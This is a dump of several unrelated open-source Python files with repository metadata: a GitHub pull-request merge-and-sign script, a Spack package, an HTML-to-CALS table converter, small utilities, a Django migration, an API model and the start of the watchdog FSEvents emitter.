blob_by_name[name] = metadata[2]
files.sort()
# open connection to git-cat-file in batch mode to request data for all blobs
# this is much faster than launching it per file
p = subprocess.Popen([GIT, 'cat-file', '--batch'], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
overall = hashlib.sha512()
for f in files:
blob = blob_by_name[f]
# request blob
p.stdin.write(blob + b'\n')
p.stdin.flush()
# read header: blob, "blob", size
reply = p.stdout.readline().split()
assert(reply[0] == blob and reply[1] == b'blob')
size = int(reply[2])
# hash the blob data
intern = hashlib.sha512()
ptr = 0
while ptr < size:
bs = min(65536, size - ptr)
piece = p.stdout.read(bs)
if len(piece) == bs:
intern.update(piece)
else:
raise IOError('Premature EOF reading git cat-file output')
ptr += bs
dig = intern.hexdigest()
assert(p.stdout.read(1) == b'\n') # ignore LF that follows blob data
# update overall hash with file hash
overall.update(dig.encode("utf-8"))
overall.update(" ".encode("utf-8"))
overall.update(f)
overall.update("\n".encode("utf-8"))
p.stdin.close()
if p.wait():
raise IOError('Non-zero return value executing git cat-file')
return overall.hexdigest()
def print_merge_details(pull, title, branch, base_branch, head_branch):
print('%s#%s%s %s %sinto %s%s' % (ATTR_RESET+ATTR_PR,pull,ATTR_RESET,title,ATTR_RESET+ATTR_PR,branch,ATTR_RESET))
subprocess.check_call([GIT,'log','--graph','--topo-order','--pretty=format:'+COMMIT_FORMAT,base_branch+'..'+head_branch])
def parse_arguments():
epilog = '''
In addition, you can set the following git configuration variables:
githubmerge.repository (mandatory),
user.signingkey (mandatory),
githubmerge.host (default: git@github.com),
githubmerge.branch (no default),
githubmerge.testcmd (default: none).
'''
parser = argparse.ArgumentParser(description='Utility to merge, sign and push github pull requests',
epilog=epilog)
parser.add_argument('pull', metavar='PULL', type=int, nargs=1,
help='Pull request ID to merge')
parser.add_argument('branch', metavar='BRANCH', type=str, nargs='?',
default=None, help='Branch to merge against (default: githubmerge.branch setting, or base branch for pull, or \'master\')')
return parser.parse_args()
def main():
# Extract settings from git repo
repo = git_config_get('githubmerge.repository')
host = git_config_get('githubmerge.host','git@github.com')
opt_branch = git_config_get('githubmerge.branch',None)
testcmd = git_config_get('githubmerge.testcmd')
signingkey = git_config_get('user.signingkey')
if repo is None:
print("ERROR: No repository configured. Use this command to set:", file=stderr)
print("git config githubmerge.repository <owner>/<repo>", file=stderr)
sys.exit(1)
if signingkey is None:
print("ERROR: No GPG signing key set. Set one using:",file=stderr)
print("git config --global user.signingkey <key>",file=stderr)
sys.exit(1)
host_repo = host+":"+repo # shortcut for push/pull target
# Extract settings from command line
args = parse_arguments()
pull = str(args.pull[0])
# Receive pull information from github
info = retrieve_pr_info(repo,pull)
if info is None:
sys.exit(1)
title = info['title'].strip()
body = info['body'].strip()
# precedence order for destination branch argument:
# - command line argument
# - githubmerge.branch setting
# - base branch for pull (as retrieved from github)
# - 'master'
branch = args.branch or opt_branch or info['base']['ref'] or 'master'
# Initialize source branches
head_branch = 'pull/'+pull+'/head'
base_branch = 'pull/'+pull+'/base'
merge_branch = 'pull/'+pull+'/merge'
local_merge_branch = 'pull/'+pull+'/local-merge'
devnull = open(os.devnull,'w')
try:
subprocess.check_call([GIT,'checkout','-q',branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot check out branch %s." % (branch), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'fetch','-q',host_repo,'+refs/pull/'+pull+'/*:refs/heads/pull/'+pull+'/*',
'+refs/heads/'+branch+':refs/heads/'+base_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find pull request #%s or branch %s on %s." % (pull,branch,host_repo), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+head_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find head of pull request #%s on %s." % (pull,host_repo), file=stderr)
sys.exit(3)
try:
subprocess.check_call([GIT,'log','-q','-1','refs/heads/'+merge_branch], stdout=devnull, stderr=stdout)
except subprocess.CalledProcessError as e:
print("ERROR: Cannot find merge of pull request #%s on %s." % (pull,host_repo), file=stderr)
sys.exit(3)
subprocess.check_call([GIT,'checkout','-q',base_branch])
subprocess.call([GIT,'branch','-q','-D',local_merge_branch], stderr=devnull)
subprocess.check_call([GIT,'checkout','-q','-b',local_merge_branch])
try:
# Go up to the repository's root.
toplevel = subprocess.check_output([GIT,'rev-parse','--show-toplevel']).strip()
os.chdir(toplevel)
# Create unsigned merge commit.
if title:
firstline = 'Merge #%s: %s' % (pull,title)
else:
firstline = 'Merge #%s' % (pull,)
message = firstline + '\n\n'
message += subprocess.check_output([GIT,'log','--no-merges','--topo-order','--pretty=format:%h %s (%an)',base_branch+'..'+head_branch]).decode('utf-8')
message += '\n\nPull request description:\n\n ' + body.replace('\n', '\n ') + '\n'
try:
subprocess.check_call([GIT,'merge','-q','--commit','--no-edit','--no-ff','-m',message.encode('utf-8'),head_branch])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot be merged cleanly.",file=stderr)
subprocess.check_call([GIT,'merge','--abort'])
sys.exit(4)
logmsg = subprocess.check_output([GIT,'log','--pretty=format:%s','-n','1']).decode('utf-8')
if logmsg.rstrip() != firstline.rstrip():
print("ERROR: Creating merge failed (already merged?).",file=stderr)
sys.exit(4)
symlink_files = get_symlink_files()
for f in symlink_files:
print("ERROR: File %s was a symlink" % f)
if len(symlink_files) > 0:
sys.exit(4)
# Put tree SHA512 into the message
try:
first_sha512 = tree_sha512sum()
message += '\n\nTree-SHA512: ' + first_sha512
except subprocess.CalledProcessError as e:
print("ERROR: Unable to compute tree hash")
sys.exit(4)
try:
subprocess.check_call([GIT,'commit','--amend','-m',message.encode('utf-8')])
except subprocess.CalledProcessError as e:
print("ERROR: Cannot update message.", file=stderr)
sys.exit(4)
print_merge_details(pull, title, branch, base_branch, head_branch)
print()
# Run test command if configured.
if testcmd:
if subprocess.call(testcmd,shell=True):
print("ERROR: Running %s failed." % testcmd,file=stderr)
sys.exit(5)
# Show the created merge.
diff = subprocess.check_output([GIT,'diff',merge_branch+'..'+local_merge_branch])
subprocess.check_call([GIT,'diff',base_branch+'..'+local_merge_branch])
if diff:
print("WARNING: merge differs from github!",file=stderr)
reply = ask_prompt("Type 'ignore' to continue.")
if reply.lower() == 'ignore':
print("Difference with github ignored.",file=stderr)
else:
sys.exit(6)
else:
# Verify the result manually.
print("Dropping you on a shell so you can try building/testing the merged source.",file=stderr)
print("Run 'git diff HEAD~' to show the changes being merged.",file=stderr)
print("Type 'exit' when done.",file=stderr)
if os.path.isfile('/etc/debian_version'): # Show pull number on Debian default prompt
os.putenv('debian_chroot',pull)
subprocess.call([BASH,'-i'])
second_sha512 = tree_sha512sum()
if first_sha512 != second_sha512:
print("ERROR: Tree hash changed unexpectedly",file=stderr)
sys.exit(8)
# Sign the merge commit.
print_merge_details(pull, title, branch, base_branch, head_branch)
while True:
reply = ask_prompt("Type 's' to sign off on the above merge, or 'x' to reject and exit.").lower()
if reply == 's':
try:
subprocess.check_call([GIT,'commit','-q','--gpg-sign','--amend','--no-edit'])
break
except subprocess.CalledProcessError as e:
print("Error while signing, asking again.",file=stderr)
elif reply == 'x':
print("Not signing off on merge, exiting.",file=stderr)
sys.exit(1)
# Put the result in branch.
subprocess.check_call([GIT,'checkout','-q',branch])
subprocess.check_call([GIT,'reset','-q','--hard',local_merge_branch])
finally:
# Clean up temporary branches.
subprocess.call([GIT,'checkout','-q',branch])
subprocess.call([GIT,'branch','-q','-D',head_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',base_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',merge_branch],stderr=devnull)
subprocess.call([GIT,'branch','-q','-D',local_merge_branch],stderr=devnull)
# Push the result.
while True:
reply = ask_prompt("Type 'push' to push the result to %s, branch %s, or 'x' to exit without pushing." % (host_repo,branch)).lower()
if reply == 'push':
subprocess.check_call([GIT,'push',host_repo,'refs/heads/'+branch])
break
elif reply == 'x':
sys.exit(1)
if __name__ == '__main__':
main()
| 42.21148
| 159
| 0.618236
|
620cd1036fe43e8de66fb18a726e1b2d007ec4b0
| 1,156
|
py
|
Python
|
var/spack/repos/builtin/packages/py-bcolz/package.py
|
MiddelkoopT/spack
|
4d94c4c4600f42a7a3bb3d06ec879140bc259304
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/py-bcolz/package.py
|
MiddelkoopT/spack
|
4d94c4c4600f42a7a3bb3d06ec879140bc259304
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
var/spack/repos/builtin/packages/py-bcolz/package.py
|
MiddelkoopT/spack
|
4d94c4c4600f42a7a3bb3d06ec879140bc259304
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | null | null | null |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyBcolz(PythonPackage):
"""bcolz provides columnar and compressed data containers. Column
storage allows for efficiently querying tables with a large number
of columns. It also allows for cheap addition and removal of column.
In addition, bcolz objects are compressed by default for reducing
memory/disk I/O needs. The compression process is carried out internally
by Blosc, a high-performance compressor that is optimized for binary data.
"""
homepage = "https://github.com/Blosc/bcolz"
pypi = "bcolz/bcolz-1.2.1.tar.gz"
version('1.2.1', sha256='c017d09bb0cb5bbb07f2ae223a3f3638285be3b574cb328e91525b2880300bd1')
depends_on('python@2.7:2.8,3.5:', type=('build', 'run'))
depends_on('py-numpy@1.7:', type=('build', 'run'))
depends_on('py-setuptools@18.1:', type='build')
depends_on('py-setuptools-scm@1.5.5:', type='build')
depends_on('py-cython@0.22:', type='build')
| 41.285714
| 95
| 0.723183
|
44b10159ef4b952622b625671005369da934be95
| 3,902
|
py
|
Python
|
HTMLtoCALS.py
|
silviolorusso/fromHTMLtoXML_InDesignFlavour
|
ec66ac70a0f4df573348b1f45e3b4573579df104
|
[
"MIT"
] | 6
|
2015-08-30T20:35:23.000Z
|
2021-03-17T11:57:06.000Z
|
HTMLtoCALS.py
|
silviolorusso/fromHTMLtoXML_InDesignFlavour
|
ec66ac70a0f4df573348b1f45e3b4573579df104
|
[
"MIT"
] | null | null | null |
HTMLtoCALS.py
|
silviolorusso/fromHTMLtoXML_InDesignFlavour
|
ec66ac70a0f4df573348b1f45e3b4573579df104
|
[
"MIT"
] | 2
|
2020-11-05T05:50:09.000Z
|
2021-06-02T14:57:56.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#####################################
# from HTML Table to XML CALS Table #
#####################################
### Open libraries
from bs4 import BeautifulSoup
import sys
### Functions
def calcRowsNumber(soup):
rows = soup.find_all('tr')
return len(rows)
def calcColsNumber(soup):
cols_number = 0
# Iterating over the rows of the table
for each_row in soup.find_all('tr'):
cells = each_row.find_all('td')
if cols_number < len(cells):
cols_number = len(cells)
return cols_number
def createTagWithAttributesPlusString(soup, tag_name, dict_attrib, new_string):
# New tag declaration
new_tag = soup.new_tag(tag_name)
# Looking for present attributes to move inside the new tag
if dict_attrib:
for k, v in dict_attrib.items():
new_tag[k] = v
# New string to put inside the tag
new_string = soup.new_string(new_string)
# Appending the string inside the tag
new_tag.append(new_string)
return new_tag
### Variables
input_file_path = '/Users/robertoarista/Desktop/conversione/sezioni/tab_finali/tab'+ str(num) +'.html'
table_width = 170.0 #mm
header_row_number = 1
table_name = 'tabella03_'+ str(num)
### Instructions
# Opening source file
table_file = open(input_file_path, 'r').read()
HTML_table = BeautifulSoup(table_file)
# Rows and cols number calculation
cols_number = calcColsNumber(HTML_table)
# New tree
CALS_table = BeautifulSoup('', 'xml')
root_tag = createTagWithAttributesPlusString(CALS_table, table_name, None, '')
# Creating tag 'table'
table_tag_attributes = {'frame':'all'}
table_tag = createTagWithAttributesPlusString(CALS_table, 'table', table_tag_attributes, '')
# Creating tag 'tgroup'
tgroup_tag_attributes = {'cols': cols_number}
tgroup_tag = createTagWithAttributesPlusString(CALS_table, 'tgroup', tgroup_tag_attributes, '')
# Creating tag 'colspec'
for i in xrange(1, cols_number+1):
colspec_tag_attributes = {
'colname':"c%01d" % i,
'colwidth': "%01dmm" % (table_width / cols_number)
}
colspec_tag = createTagWithAttributesPlusString(CALS_table, 'colspec', colspec_tag_attributes, '')
tgroup_tag.append(colspec_tag)
# Creating tag 'thead' e 'tbody'
head_tag = createTagWithAttributesPlusString(CALS_table, 'thead', None, '')
body_tag = createTagWithAttributesPlusString(CALS_table, 'tbody', None, '')
# Iterating over HTML rows
for i, each_row in enumerate(HTML_table.find_all('tr')):
# Creating tag 'row'
row_tag = createTagWithAttributesPlusString(CALS_table, 'row', None, '')
# Iterating over 'td' (HTML cells tags)
for j, each_col in enumerate(each_row.find_all('td')):
# Extracting contents from HTML cells
contenuto_cell = each_col.text.replace('\t', '').replace('\n', ' ').lstrip().rstrip()
# Attributes for entry tag (CALS cell)
entry_tag_attributes = {'align':"left", 'valign':"top"}
# Multiple rows cell
if 'rowspan' in each_col.attrs:
entry_tag_attributes['morerows'] = int(each_col.attrs['rowspan'])-1
# Multiple columns cell
if 'colspan' in each_col.attrs:
begin = "c%01d" % (j+1)
end = "c%01d" % (j+int(each_col.attrs['colspan']))
entry_tag_attributes['namest'] = begin
entry_tag_attributes['nameend'] = end
# Creating 'entry' tag (CALS cell)
entry_tag = createTagWithAttributesPlusString(CALS_table, 'entry', entry_tag_attributes, '')
entry_tag.string = contenuto_cell
# Appending cell into row
row_tag.append(entry_tag)
if i <= header_row_number-1:
head_tag.append(row_tag)
else:
body_tag.append(row_tag)
# Appending header to table
tgroup_tag.append(head_tag)
tgroup_tag.append(body_tag)
# Appending tgroup to table
table_tag.append(tgroup_tag)
# Appending table to root
root_tag.append(table_tag)
# Appending root to soup
CALS_table.append(root_tag)
# Writing table to xml file
with open(input_file_path[:-4]+'xml', "w") as myfile:
myfile.write(CALS_table.prettify().encode('utf-8'))
| 26.726027
| 102
| 0.722706
|
267cfd60c5c2688d3fb0beb089b0028f176d6977
| 410
|
py
|
Python
|
utils/qtUtils.py
|
JamesQFreeman/MicEye
|
1290c071758ae4634cd374c8fd54c0d667952049
|
[
"MIT"
] | 11
|
2021-09-23T07:42:57.000Z
|
2022-03-09T15:39:32.000Z
|
utils/qtUtils.py
|
JamesQFreeman/MicEye
|
1290c071758ae4634cd374c8fd54c0d667952049
|
[
"MIT"
] | 1
|
2022-03-09T07:21:23.000Z
|
2022-03-09T07:21:23.000Z
|
utils/qtUtils.py
|
JamesQFreeman/MicEye
|
1290c071758ae4634cd374c8fd54c0d667952049
|
[
"MIT"
] | 1
|
2022-03-09T15:39:33.000Z
|
2022-03-09T15:39:33.000Z
|
from PyQt5.QtWidgets import (QApplication, QWidget, QGroupBox, QInputDialog, QDialog, QPushButton,
QLabel, QVBoxLayout, QHBoxLayout, QDesktopWidget, QLineEdit)
def moveToCenter(widget: QWidget):
qtRectangle = widget.frameGeometry()
centerPoint = QDesktopWidget().availableGeometry().center()
qtRectangle.moveCenter(centerPoint)
widget.move(qtRectangle.topLeft())
| 41
| 98
| 0.729268
|
2dc2bc2ef57b74144e1d5f54dc0ccf0a9cff9f76
| 2,426
|
py
|
Python
|
examples/mesh/experiments/test_mask.py
|
SebastianoF/pyro2
|
9d1787c2ee25d735a414db3da8c00287743a6fde
|
[
"BSD-3-Clause"
] | 151
|
2018-08-14T12:52:22.000Z
|
2022-03-29T07:57:01.000Z
|
examples/mesh/experiments/test_mask.py
|
SebastianoF/pyro2
|
9d1787c2ee25d735a414db3da8c00287743a6fde
|
[
"BSD-3-Clause"
] | 40
|
2015-03-25T15:45:44.000Z
|
2018-07-30T18:48:47.000Z
|
examples/mesh/experiments/test_mask.py
|
SebastianoF/pyro2
|
9d1787c2ee25d735a414db3da8c00287743a6fde
|
[
"BSD-3-Clause"
] | 56
|
2018-10-10T16:54:59.000Z
|
2022-02-06T08:48:52.000Z
|
#!/usr/bin/env python3
from mesh import patch
import mesh.boundary as bnd
import numpy as np
import time
class Mask(object):
def __init__(self, nx, ny, ng):
self.nx = nx
self.ny = ny
self.ng = ng
ilo = ng
ihi = ng+nx-1
jlo = ng
jhi = ng+ny-1
# just the interior cells
self.valid = self._mask_array(nx, ny, ng)
# shifts in x
self.ip1 = self._mask_array(nx, ny, ng)
self.im1 = self._mask_array(nx, ny, ng)
self.ip2 = self._mask_array(nx, ny, ng)
self.im2 = self._mask_array(nx, ny, ng)
arrays = [self.valid, self.ip1, self.im1, self.ip2, self.im2]
shifts = [0, 1, -1, 2, -2]
for a, s in zip(arrays, shifts):
a[ilo+s:ihi+1+s, jlo:jhi+1] = True
# shifts in y
self.jp1 = self._mask_array(nx, ny, ng)
self.jm1 = self._mask_array(nx, ny, ng)
self.jp2 = self._mask_array(nx, ny, ng)
self.jm2 = self._mask_array(nx, ny, ng)
arrays = [self.jp1, self.jm1, self.jp2, self.jm2]
shifts = [1, -1, 2, -2]
for a, s in zip(arrays, shifts):
a[ilo:ihi+1, jlo+s:jhi+1+s] = True
def _mask_array(self, nx, ny, ng):
return np.zeros((nx+2*ng, ny+2*ng), dtype=bool)
n = 1024
myg = patch.Grid2d(n, 2*n, xmax=1.0, ymax=2.0)
myd = patch.CellCenterData2d(myg)
bc = bnd.BC()
myd.register_var("a", bc)
myd.create()
a = myd.get_var("a")
a[:, :] = np.random.rand(myg.qx, myg.qy)
# slicing method
start = time.time()
da = myg.scratch_array()
da[myg.ilo:myg.ihi+1, myg.jlo:myg.jhi+1] = \
a[myg.ilo+1:myg.ihi+2, myg.jlo:myg.jhi+1] - \
a[myg.ilo-1:myg.ihi, myg.jlo:myg.jhi+1]
print("slice method: ", time.time() - start)
# mask method
m = Mask(myg.nx, myg.ny, myg.ng)
start = time.time()
da2 = myg.scratch_array()
da2[m.valid] = a[m.ip1] - a[m.im1]
print("mask method: ", time.time() - start)
print(np.max(np.abs(da2 - da)))
# roll -- note, we roll in the opposite direction of the shift
start = time.time()
da3 = myg.scratch_array()
da3[:] = np.roll(a, -1, axis=0) - np.roll(a, 1, axis=0)
print("roll method: ", time.time() - start)
print(np.max(np.abs(da3[m.valid] - da[m.valid])))
# ArrayIndex
start = time.time()
da4 = myg.scratch_array()
da4.v()[:, :] = a.ip(1) - a.ip(-1)
print("ArrayIndex method: ", time.time() - start)
print(np.max(np.abs(da4[m.valid] - da[m.valid])))
| 22.256881
| 69
| 0.578318
|
7b4516b8a47b38b990bc83815aa4686db70f9acf
| 1,847
|
py
|
Python
|
spotdl/search/spotifyClient.py
|
ksu-is/spotify-downloader
|
1a08703b8beff98540d6a7052d8393fe2c6fa551
|
[
"MIT"
] | 6
|
2021-05-27T08:25:48.000Z
|
2022-02-08T21:37:24.000Z
|
spotdl/search/spotifyClient.py
|
ksu-is/spotify-downloader
|
1a08703b8beff98540d6a7052d8393fe2c6fa551
|
[
"MIT"
] | null | null | null |
spotdl/search/spotifyClient.py
|
ksu-is/spotify-downloader
|
1a08703b8beff98540d6a7052d8393fe2c6fa551
|
[
"MIT"
] | 1
|
2021-04-06T01:03:40.000Z
|
2021-04-06T01:03:40.000Z
|
from spotipy import Spotify
from spotipy.oauth2 import SpotifyClientCredentials
class Singleton(type):
"""
Singleton metaclass for SpotifyClient. Ensures that SpotifyClient is not
instantiated without prior initialization. Every other instantiation of
SpotifyClient will return the same instance.
"""
_instance = None
def __call__(cls):
if cls._instance is None:
raise Exception('Spotify client not created. Call SpotifyClient.init'
'(client_id, client_secret) first.')
return cls._instance
def init(cls, client_id: str, client_secret: str) -> "Singleton":
'''
`str` `client_id` : client id from your spotify account
`str` `client_secret` : client secret for your client id
creates and caches a spotify client if a client doesn't exist. Can only be called
once, multiple calls will cause an Exception.
'''
# check if initialization has been completed, if yes, raise an Exception
if cls._instance and cls._instance.is_initialized():
raise Exception('A spotify client has already been initialized')
credentialManager = SpotifyClientCredentials(
client_id=client_id,
client_secret=client_secret
)
cls._instance = super().__call__(client_credentials_manager=credentialManager)
return cls._instance
class SpotifyClient(Spotify, metaclass=Singleton):
"""
This is the Spotify client meant to be used in the app. Has to be initialized first by
calling `SpotifyClient.init(client_id, client_secret)`.
"""
_initialized = False
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._initialized = True
def is_intialized(self):
return self._initialized
| 34.203704
| 90
| 0.674607
|
ed14a7e338972aa8743bbca2cd32139fcb5ae7c7
| 886
|
py
|
Python
|
Scripts/Log/CustomThreads/Utils/Utils_function.py
|
Sk3pper/AASSS-PoC
|
67630221f029df0f1fbc598ad3c791d0cd429544
|
[
"CC-BY-4.0"
] | null | null | null |
Scripts/Log/CustomThreads/Utils/Utils_function.py
|
Sk3pper/AASSS-PoC
|
67630221f029df0f1fbc598ad3c791d0cd429544
|
[
"CC-BY-4.0"
] | null | null | null |
Scripts/Log/CustomThreads/Utils/Utils_function.py
|
Sk3pper/AASSS-PoC
|
67630221f029df0f1fbc598ad3c791d0cd429544
|
[
"CC-BY-4.0"
] | null | null | null |
import os
# scrive i dati in un file
# se presente gli appende
# se non presente crea il file da zero
import socket
def write_data(path_file_name, data):
"""
:type path_file_name: str
:type data: str
"""
# file does not exist
if not os.path.isfile(path_file_name):
with open(path_file_name, "w+") as f:
f.write("timestamp\tPhase\tFrom\tTo\tPayload\n")
f.write(data)
print " " + str(data[:-2]) + " are saved in path:" + path_file_name
return True
# file exists
else:
with open(path_file_name, "a") as f:
f.write(data)
print " " + str(data[:-2]) + " are saved in path:" + path_file_name
return True
# check if exists a user dir -> if not create it
def check_dir(path_user):
if not os.path.isdir(path_user):
os.makedirs(path_user)
| 26.058824
| 83
| 0.590293
|
1d9a2f0a1b0d130b181b04ca90fd470c80b1097a
| 386
|
py
|
Python
|
ots/main/migrations/0014_alter_userblog_title.py
|
hasibarrafiul/Travel-Guide-WebApp
|
f160ce1c4ef95b6e08abcaebf2c702bfdecacd6f
|
[
"MIT"
] | 3
|
2021-12-17T22:22:07.000Z
|
2022-01-25T13:28:10.000Z
|
ots/main/migrations/0014_alter_userblog_title.py
|
hasibarrafiul/Travel-Guide-WebApp
|
f160ce1c4ef95b6e08abcaebf2c702bfdecacd6f
|
[
"MIT"
] | 8
|
2021-11-11T10:43:35.000Z
|
2022-01-08T23:27:33.000Z
|
ots/main/migrations/0014_alter_userblog_title.py
|
hasibarrafiul/Travel-Guide-WebApp
|
f160ce1c4ef95b6e08abcaebf2c702bfdecacd6f
|
[
"MIT"
] | 3
|
2021-11-20T18:35:59.000Z
|
2022-02-15T13:35:47.000Z
|
# Generated by Django 3.2.6 on 2021-12-29 18:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0013_userblog'),
]
operations = [
migrations.AlterField(
model_name='userblog',
name='Title',
field=models.CharField(max_length=300, null=True),
),
]
| 20.315789
| 62
| 0.590674
|
8a9994ff2dc5fb720fc68dedca6d0074c97ae312
| 883
|
py
|
Python
|
users/migrations/0006_auto_20210511_0722.py
|
boussier/CCPSMV_dashboard
|
5a0ac667713f7fd9e3e93c2a83e3da6f3657323f
|
[
"MIT"
] | null | null | null |
users/migrations/0006_auto_20210511_0722.py
|
boussier/CCPSMV_dashboard
|
5a0ac667713f7fd9e3e93c2a83e3da6f3657323f
|
[
"MIT"
] | null | null | null |
users/migrations/0006_auto_20210511_0722.py
|
boussier/CCPSMV_dashboard
|
5a0ac667713f7fd9e3e93c2a83e3da6f3657323f
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2 on 2021-05-11 07:22
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('users', '0005_auto_20210511_0710'),
]
operations = [
migrations.AlterModelOptions(
name='customuser',
options={'verbose_name': 'Utilisateur'},
),
migrations.AddField(
model_name='customuser',
name='agendaRemoteWorking',
field=models.ManyToManyField(to='users.TimeWindow', verbose_name='Agenda télétravail'),
),
migrations.AddField(
model_name='customuser',
name='vehicleType',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='users.vehicletype', verbose_name='Type de véhicule'),
),
]
| 30.448276
| 161
| 0.628539
|
3147d91c77d17db2b99d4cfd500bee861ca9a08a
| 179
|
py
|
Python
|
accounts/views.py
|
knyghty/bord
|
b5c607a6d4ee05255d8e6e77a531b0481966860b
|
[
"MIT"
] | null | null | null |
accounts/views.py
|
knyghty/bord
|
b5c607a6d4ee05255d8e6e77a531b0481966860b
|
[
"MIT"
] | 4
|
2016-11-05T02:53:02.000Z
|
2018-01-13T19:57:24.000Z
|
accounts/views.py
|
knyghty/bord
|
b5c607a6d4ee05255d8e6e77a531b0481966860b
|
[
"MIT"
] | null | null | null |
from registration.backends.simple.views import RegistrationView
from .forms import UserCreationForm
class RegistrationView(RegistrationView):
form_class = UserCreationForm
| 22.375
| 63
| 0.843575
|
fdb96d8f267d03fdb9160fbb1476f44ddbb1a674
| 3,121
|
py
|
Python
|
beanie/models/nominal_account_category_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
beanie/models/nominal_account_category_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
beanie/models/nominal_account_category_input.py
|
altoyield/python-beanieclient
|
448b8dd328054eaf32dd7d0bdff700e603b5c27d
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Beanie ERP API
An API specification for interacting with the Beanie ERP system # noqa: E501
OpenAPI spec version: 0.8
Contact: dev@bean.ie
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from beanie.models.nominal_account_category import NominalAccountCategory # noqa: F401,E501
class NominalAccountCategoryInput(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'int'
}
attribute_map = {
'id': 'id'
}
def __init__(self, id=None): # noqa: E501
"""NominalAccountCategoryInput - a model defined in Swagger""" # noqa: E501
self._id = None
self.discriminator = None
self.id = id
@property
def id(self):
"""Gets the id of this NominalAccountCategoryInput. # noqa: E501
:return: The id of this NominalAccountCategoryInput. # noqa: E501
:rtype: int
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this NominalAccountCategoryInput.
:param id: The id of this NominalAccountCategoryInput. # noqa: E501
:type: int
"""
if id is None:
raise ValueError("Invalid value for `id`, must not be `None`") # noqa: E501
self._id = id
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, NominalAccountCategoryInput):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 26.905172
| 92
| 0.565203
|
674814800745c049e6594b81cfaa9a460acb354a
| 6,543
|
py
|
Python
|
src/watchdog/observers/fsevents.py
|
yotabits/python-watchdog
|
3e111e3a50d06ac2fba2c94a9406c7e04c49bf9b
|
[
"ECL-2.0",
"Apache-2.0"
] | 31
|
2016-11-24T11:17:46.000Z
|
2022-02-14T22:45:39.000Z
|
src/watchdog/observers/fsevents.py
|
yotabits/python-watchdog
|
3e111e3a50d06ac2fba2c94a9406c7e04c49bf9b
|
[
"ECL-2.0",
"Apache-2.0"
] | 8
|
2017-11-17T03:25:29.000Z
|
2021-05-04T00:32:28.000Z
|
src/watchdog/observers/fsevents.py
|
yotabits/python-watchdog
|
3e111e3a50d06ac2fba2c94a9406c7e04c49bf9b
|
[
"ECL-2.0",
"Apache-2.0"
] | 12
|
2017-01-23T08:58:41.000Z
|
2019-04-30T03:35:31.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2011 Yesudeep Mangalapilly <yesudeep@gmail.com>
# Copyright 2012 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:module: watchdog.observers.fsevents
:synopsis: FSEvents based emitter implementation.
:author: yesudeep@google.com (Yesudeep Mangalapilly)
:platforms: Mac OS X
"""
from __future__ import with_statement
import sys
import threading
import unicodedata
import _watchdog_fsevents as _fsevents
from watchdog.events import (
FileDeletedEvent,
FileModifiedEvent,
FileCreatedEvent,
FileMovedEvent,
DirDeletedEvent,
DirModifiedEvent,
DirCreatedEvent,
DirMovedEvent
)
from watchdog.utils.dirsnapshot import DirectorySnapshot
from watchdog.observers.api import (
BaseObserver,
EventEmitter,
DEFAULT_EMITTER_TIMEOUT,
DEFAULT_OBSERVER_TIMEOUT
)
class FSEventsEmitter(EventEmitter):
"""
Mac OS X FSEvents Emitter class.
:param event_queue:
The event queue to fill with events.
:param watch:
